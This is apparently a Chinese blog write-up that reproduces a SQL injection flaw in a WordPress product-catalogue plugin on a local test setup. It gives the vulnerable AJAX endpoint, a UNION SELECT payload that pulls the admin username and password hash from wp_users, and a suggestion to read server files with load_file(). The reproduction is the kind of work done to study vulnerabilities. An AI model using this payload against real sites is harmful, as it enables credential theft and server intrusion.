前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >WordPress插件SQL漏洞复现

WordPress插件SQL漏洞复现

作者头像
漏斗社区
发布2018-03-28 13:58:57
1.6K0
发布2018-03-28 13:58:57
举报
文章被收录于专栏:漏斗社区

该SQL漏洞存在于wordpress的插件Ultimate Produce Catalogue 4.2.2版本,在Exploit Database可以搜到这个漏洞的信息:

https://www.exploit-db.com/exploits/42263/。

01

基础环境

1. WordPress _v4.6源码,安装Ultimate Produce Catalogue 4.2.2版本插件。

2. 本机电脑搭建phpstudy作为WEB环境。

02

源码部署

首先wordpress的安装,这个之前在我们公众号文章《WordPress _v4.6远程代码执行漏洞复现》已经有详细的搭建过程,有不明白的小伙伴可以查看历史发送记录,或者到漏斗社区论坛也可以看到。

下面介绍插件安装,Ultimate Produce Catalogue插件安装包的下载地址:

链接:http://pan.baidu.com/s/1o8Rvdfs

密码:avul

下载之后,进入首页,选择插件,添加插件并安装。

安装完成,启用插件。

03

漏洞复现过程

首先我们使用管理账号新建一个账号,名为testsql,利用testsql这个账号通过sql注入漏洞拿到管理员的账号。

然后使用testsql这个账号进行登陆。

存在漏洞的地址如下:

http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=get_upcp_subcategories

[请求数据]

CatID=0 UNION SELECT 1,2

引起这个漏洞的原因是CatID的参数没有做转义处理导致sql注入,如下图,可执行sql语句。

获取管理员账号和密码的sql语句:

Payload:

CatID=0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1

04

总结

这个漏洞有点鸡肋,首先必须使用存在的账号登陆才能够回显数据,接着获得admin的账号密码之后,密码的破解难度很大,我们可以使用load_file()去读取系统的文件,如下是读取数据库的配置文件。

查看源代码:

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-07-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 漏斗社区 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档